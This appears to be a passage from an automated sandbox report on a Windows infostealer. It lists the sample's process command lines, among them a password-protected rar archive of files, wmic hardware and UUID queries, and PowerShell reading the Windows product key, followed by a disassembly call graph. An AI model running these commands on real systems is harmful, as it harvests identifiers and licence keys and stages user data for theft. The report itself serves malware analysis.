                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:83
                                                                                                                                                                                                                                            Start time:05:22:32
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *
                                                                                                                                                                                                                                            Imagebase:0x7ff64fe50000
                                                                                                                                                                                                                                            File size:630'736 bytes
                                                                                                                                                                                                                                            MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:84
                                                                                                                                                                                                                                            Start time:05:22:33
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:85
                                                                                                                                                                                                                                            Start time:05:22:33
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:86
                                                                                                                                                                                                                                            Start time:05:22:34
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:wmic os get Caption
                                                                                                                                                                                                                                            Imagebase:0x7ff71fde0000
                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:87
                                                                                                                                                                                                                                            Start time:05:22:34
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:88
                                                                                                                                                                                                                                            Start time:05:22:34
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:89
                                                                                                                                                                                                                                            Start time:05:22:34
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                                            Imagebase:0x7ff71fde0000
                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:90
                                                                                                                                                                                                                                            Start time:05:22:36
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:91
                                                                                                                                                                                                                                            Start time:05:22:36
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:92
                                                                                                                                                                                                                                            Start time:05:22:36
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                            Imagebase:0x7ff71fde0000
                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:93
                                                                                                                                                                                                                                            Start time:05:22:36
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:94
                                                                                                                                                                                                                                            Start time:05:22:36
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:95
                                                                                                                                                                                                                                            Start time:05:22:36
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:96
                                                                                                                                                                                                                                            Start time:05:22:37
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:97
                                                                                                                                                                                                                                            Start time:05:22:37
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:98
                                                                                                                                                                                                                                            Start time:05:22:37
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                            Imagebase:0x7ff71fde0000
                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:99
                                                                                                                                                                                                                                            Start time:05:22:38
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:100
                                                                                                                                                                                                                                            Start time:05:22:38
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:101
                                                                                                                                                                                                                                            Start time:05:22:38
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:8.6%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                              Signature Coverage:19.9%
                                                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                                                              Total number of Limit Nodes:36
                                                                                                                                                                                                                                              execution_graph 19395 7ff6b751c520 19406 7ff6b75202d8 EnterCriticalSection 19395->19406 15918 7ff6b7515628 15919 7ff6b751565f 15918->15919 15920 7ff6b7515642 15918->15920 15919->15920 15922 7ff6b7515672 CreateFileW 15919->15922 15943 7ff6b7514ee8 15920->15943 15924 7ff6b75156a6 15922->15924 15925 7ff6b75156dc 15922->15925 15952 7ff6b751577c GetFileType 15924->15952 15978 7ff6b7515c04 15925->15978 15932 7ff6b75156bb CloseHandle 15937 7ff6b751565a 15932->15937 15933 7ff6b75156d1 CloseHandle 15933->15937 15934 7ff6b7515710 16004 7ff6b75159c4 15934->16004 15935 7ff6b75156e5 15999 7ff6b7514e7c 15935->15999 15942 7ff6b75156ef 15942->15937 16021 7ff6b751b2c8 GetLastError 15943->16021 15945 7ff6b7514ef1 15946 7ff6b7514f08 15945->15946 15947 7ff6b751b2c8 _get_daylight 11 API calls 15946->15947 15948 7ff6b7514f11 15947->15948 15949 7ff6b751a8e0 15948->15949 16079 7ff6b751a778 15949->16079 15951 7ff6b751a8f9 15951->15937 15953 7ff6b7515887 15952->15953 15954 7ff6b75157ca 15952->15954 15955 7ff6b751588f 15953->15955 15956 7ff6b75158b1 15953->15956 15957 7ff6b75157f6 GetFileInformationByHandle 15954->15957 15958 7ff6b7515b00 21 API calls 15954->15958 15959 7ff6b75158a2 GetLastError 15955->15959 15960 7ff6b7515893 15955->15960 15962 7ff6b75158d4 PeekNamedPipe 15956->15962 15968 7ff6b7515872 15956->15968 15957->15959 15961 7ff6b751581f 15957->15961 15963 7ff6b75157e4 15958->15963 15966 7ff6b7514e7c _fread_nolock 11 API calls 15959->15966 15964 7ff6b7514f08 _get_daylight 11 API calls 15960->15964 15965 7ff6b75159c4 51 API calls 15961->15965 15962->15968 15963->15957 15963->15968 15964->15968 15969 7ff6b751582a 15965->15969 15966->15968 15967 7ff6b750c550 _log10_special 8 API calls 15970 7ff6b75156b4 15967->15970 15968->15967 16145 7ff6b7515924 15969->16145 15970->15932 15970->15933 15973 7ff6b7515924 10 API calls 15974 7ff6b7515849 15973->15974 15975 7ff6b7515924 10 API calls 15974->15975 15976 7ff6b751585a 15975->15976 15976->15968 15977 7ff6b7514f08 _get_daylight 11 API calls 15976->15977 15977->15968 15979 7ff6b7515c3a 15978->15979 15980 7ff6b7514f08 _get_daylight 11 API calls 15979->15980 15998 7ff6b7515cd2 __std_exception_destroy 15979->15998 15982 7ff6b7515c4c 15980->15982 15981 7ff6b750c550 _log10_special 8 API calls 15983 7ff6b75156e1 15981->15983 15984 7ff6b7514f08 _get_daylight 11 API calls 15982->15984 15983->15934 15983->15935 15985 7ff6b7515c54 15984->15985 16152 7ff6b7517e08 15985->16152 15987 7ff6b7515c69 15988 7ff6b7515c7b 15987->15988 15989 7ff6b7515c71 15987->15989 15991 7ff6b7514f08 _get_daylight 11 API calls 15988->15991 15990 7ff6b7514f08 _get_daylight 11 API calls 15989->15990 15995 7ff6b7515c76 15990->15995 15992 7ff6b7515c80 15991->15992 15993 7ff6b7514f08 _get_daylight 11 API calls 15992->15993 15992->15998 15994 7ff6b7515c8a 15993->15994 15996 7ff6b7517e08 45 API calls 15994->15996 15997 7ff6b7515cc4 GetDriveTypeW 15995->15997 15995->15998 15996->15995 15997->15998 15998->15981 16000 7ff6b751b2c8 _get_daylight 11 API calls 15999->16000 16001 7ff6b7514e89 __free_lconv_num 16000->16001 16002 7ff6b751b2c8 _get_daylight 11 API calls 16001->16002 16003 7ff6b7514eab 16002->16003 16003->15942 16005 7ff6b75159ec 16004->16005 16013 7ff6b751571d 16005->16013 16246 7ff6b751f724 16005->16246 16007 7ff6b7515a80 16008 7ff6b751f724 51 API calls 16007->16008 16007->16013 16009 7ff6b7515a93 16008->16009 16010 7ff6b751f724 51 API calls 16009->16010 16009->16013 16011 7ff6b7515aa6 16010->16011 16012 7ff6b751f724 51 API calls 16011->16012 16011->16013 16012->16013 16014 7ff6b7515b00 16013->16014 16015 7ff6b7515b1a 16014->16015 16016 7ff6b7515b51 16015->16016 16017 7ff6b7515b2a 16015->16017 16018 7ff6b751f5b8 21 API calls 16016->16018 16019 7ff6b7514e7c _fread_nolock 11 API calls 16017->16019 16020 7ff6b7515b3a 16017->16020 16018->16020 16019->16020 16020->15942 16022 7ff6b751b309 FlsSetValue 16021->16022 16024 7ff6b751b2ec 16021->16024 16023 7ff6b751b31b 16022->16023 16036 7ff6b751b2f9 SetLastError 16022->16036 16038 7ff6b751eb98 16023->16038 16024->16022 16024->16036 16027 7ff6b751b32a 16028 7ff6b751b348 FlsSetValue 16027->16028 16029 7ff6b751b338 FlsSetValue 16027->16029 16030 7ff6b751b366 16028->16030 16031 7ff6b751b354 FlsSetValue 16028->16031 16032 7ff6b751b341 16029->16032 16051 7ff6b751aef4 16030->16051 16031->16032 16045 7ff6b751a948 16032->16045 16036->15945 16043 7ff6b751eba9 _get_daylight 16038->16043 16039 7ff6b751ebfa 16042 7ff6b7514f08 _get_daylight 10 API calls 16039->16042 16040 7ff6b751ebde HeapAlloc 16041 7ff6b751ebf8 16040->16041 16040->16043 16041->16027 16042->16041 16043->16039 16043->16040 16056 7ff6b7523590 16043->16056 16046 7ff6b751a94d RtlFreeHeap 16045->16046 16047 7ff6b751a97c 16045->16047 16046->16047 16048 7ff6b751a968 GetLastError 16046->16048 16047->16036 16049 7ff6b751a975 __free_lconv_num 16048->16049 16050 7ff6b7514f08 _get_daylight 9 API calls 16049->16050 16050->16047 16065 7ff6b751adcc 16051->16065 16059 7ff6b75235d0 16056->16059 16064 7ff6b75202d8 EnterCriticalSection 16059->16064 16077 7ff6b75202d8 EnterCriticalSection 16065->16077 16080 7ff6b751a7a3 16079->16080 16083 7ff6b751a814 16080->16083 16082 7ff6b751a7ca 16082->15951 16093 7ff6b751a55c 16083->16093 16086 7ff6b751a84f 16086->16082 16094 7ff6b751a578 GetLastError 16093->16094 16095 7ff6b751a5b3 16093->16095 16096 7ff6b751a588 16094->16096 16095->16086 16099 7ff6b751a5c8 16095->16099 16106 7ff6b751b390 16096->16106 16100 7ff6b751a5fc 16099->16100 16101 7ff6b751a5e4 GetLastError SetLastError 16099->16101 16100->16086 16102 7ff6b751a900 IsProcessorFeaturePresent 16100->16102 16101->16100 16103 7ff6b751a913 16102->16103 16123 7ff6b751a614 16103->16123 16107 7ff6b751b3ca FlsSetValue 16106->16107 16108 7ff6b751b3af FlsGetValue 16106->16108 16110 7ff6b751b3d7 16107->16110 16111 7ff6b751a5a3 SetLastError 16107->16111 16109 7ff6b751b3c4 16108->16109 16108->16111 16109->16107 16112 7ff6b751eb98 _get_daylight 11 API calls 16110->16112 16111->16095 16113 7ff6b751b3e6 16112->16113 16114 7ff6b751b404 FlsSetValue 16113->16114 16115 7ff6b751b3f4 FlsSetValue 16113->16115 16116 7ff6b751b410 FlsSetValue 16114->16116 16117 7ff6b751b422 16114->16117 16118 7ff6b751b3fd 16115->16118 16116->16118 16120 7ff6b751aef4 _get_daylight 11 API calls 16117->16120 16119 7ff6b751a948 __free_lconv_num 11 API calls 16118->16119 16119->16111 16121 7ff6b751b42a 16120->16121 16122 7ff6b751a948 __free_lconv_num 11 API calls 16121->16122 16122->16111 16124 7ff6b751a64e __FrameHandler3::FrameUnwindToEmptyState __scrt_get_show_window_mode 16123->16124 16125 7ff6b751a676 RtlCaptureContext RtlLookupFunctionEntry 16124->16125 16126 7ff6b751a6e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16125->16126 16127 7ff6b751a6b0 RtlVirtualUnwind 16125->16127 16129 7ff6b751a738 __FrameHandler3::FrameUnwindToEmptyState 16126->16129 16127->16126 16131 7ff6b750c550 16129->16131 16132 7ff6b750c559 16131->16132 16133 7ff6b750c564 GetCurrentProcess TerminateProcess 16132->16133 16134 7ff6b750c8e0 IsProcessorFeaturePresent 16132->16134 16135 7ff6b750c8f8 16134->16135 16140 7ff6b750cad8 RtlCaptureContext 16135->16140 16141 7ff6b750caf2 RtlLookupFunctionEntry 16140->16141 16142 7ff6b750cb08 RtlVirtualUnwind 16141->16142 16143 7ff6b750c90b 16141->16143 16142->16141 16142->16143 16144 7ff6b750c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16143->16144 16146 7ff6b751594d FileTimeToSystemTime 16145->16146 16147 7ff6b7515940 16145->16147 16148 7ff6b7515961 SystemTimeToTzSpecificLocalTime 16146->16148 16149 7ff6b7515948 16146->16149 16147->16146 16147->16149 16148->16149 16150 7ff6b750c550 _log10_special 8 API calls 16149->16150 16151 7ff6b7515839 16150->16151 16151->15973 16153 7ff6b7517e92 16152->16153 16154 7ff6b7517e24 16152->16154 16189 7ff6b75207c0 16153->16189 16154->16153 16156 7ff6b7517e29 16154->16156 16157 7ff6b7517e5e 16156->16157 16158 7ff6b7517e41 16156->16158 16172 7ff6b7517c4c GetFullPathNameW 16157->16172 16164 7ff6b7517bd8 GetFullPathNameW 16158->16164 16163 7ff6b7517e56 __std_exception_destroy 16163->15987 16165 7ff6b7517bfe GetLastError 16164->16165 16166 7ff6b7517c14 16164->16166 16167 7ff6b7514e7c _fread_nolock 11 API calls 16165->16167 16170 7ff6b7514f08 _get_daylight 11 API calls 16166->16170 16171 7ff6b7517c10 16166->16171 16168 7ff6b7517c0b 16167->16168 16169 7ff6b7514f08 _get_daylight 11 API calls 16168->16169 16169->16171 16170->16171 16171->16163 16173 7ff6b7517c7f GetLastError 16172->16173 16178 7ff6b7517c95 __std_exception_destroy 16172->16178 16174 7ff6b7514e7c _fread_nolock 11 API calls 16173->16174 16175 7ff6b7517c8c 16174->16175 16176 7ff6b7514f08 _get_daylight 11 API calls 16175->16176 16177 7ff6b7517c91 16176->16177 16180 7ff6b7517d24 16177->16180 16178->16177 16179 7ff6b7517cef GetFullPathNameW 16178->16179 16179->16173 16179->16177 16183 7ff6b7517d98 memcpy_s 16180->16183 16184 7ff6b7517d4d __scrt_get_show_window_mode 16180->16184 16181 7ff6b7517d81 16182 7ff6b7514f08 _get_daylight 11 API calls 16181->16182 16185 7ff6b7517d86 16182->16185 16183->16163 16184->16181 16184->16183 16186 7ff6b7517dba 16184->16186 16187 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 16185->16187 16186->16183 16188 7ff6b7514f08 _get_daylight 11 API calls 16186->16188 16187->16183 16188->16185 16192 7ff6b75205d0 16189->16192 16193 7ff6b75205fb 16192->16193 16194 7ff6b7520612 16192->16194 16195 7ff6b7514f08 _get_daylight 11 API calls 16193->16195 16196 7ff6b7520637 16194->16196 16197 7ff6b7520616 16194->16197 16198 7ff6b7520600 16195->16198 16230 7ff6b751f5b8 16196->16230 16218 7ff6b752073c 16197->16218 16203 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 16198->16203 16201 7ff6b752063c 16206 7ff6b75206e1 16201->16206 16213 7ff6b7520663 16201->16213 16214 7ff6b752060b __std_exception_destroy 16203->16214 16204 7ff6b752061f 16205 7ff6b7514ee8 _fread_nolock 11 API calls 16204->16205 16207 7ff6b7520624 16205->16207 16206->16193 16208 7ff6b75206e9 16206->16208 16210 7ff6b7514f08 _get_daylight 11 API calls 16207->16210 16211 7ff6b7517bd8 13 API calls 16208->16211 16209 7ff6b750c550 _log10_special 8 API calls 16212 7ff6b7520731 16209->16212 16210->16198 16211->16214 16212->16163 16215 7ff6b7517c4c 14 API calls 16213->16215 16214->16209 16216 7ff6b75206a7 16215->16216 16216->16214 16217 7ff6b7517d24 37 API calls 16216->16217 16217->16214 16219 7ff6b7520786 16218->16219 16220 7ff6b7520756 16218->16220 16222 7ff6b7520771 16219->16222 16223 7ff6b7520791 GetDriveTypeW 16219->16223 16221 7ff6b7514ee8 _fread_nolock 11 API calls 16220->16221 16224 7ff6b752075b 16221->16224 16226 7ff6b750c550 _log10_special 8 API calls 16222->16226 16223->16222 16225 7ff6b7514f08 _get_daylight 11 API calls 16224->16225 16227 7ff6b7520766 16225->16227 16228 7ff6b752061b 16226->16228 16229 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 16227->16229 16228->16201 16228->16204 16229->16222 16244 7ff6b752a4d0 16230->16244 16233 7ff6b751f62c 16235 7ff6b751eb98 _get_daylight 11 API calls 16233->16235 16234 7ff6b751f605 16237 7ff6b750c550 _log10_special 8 API calls 16234->16237 16236 7ff6b751f63b 16235->16236 16238 7ff6b751f645 GetCurrentDirectoryW 16236->16238 16239 7ff6b751f654 16236->16239 16240 7ff6b751f699 16237->16240 16238->16239 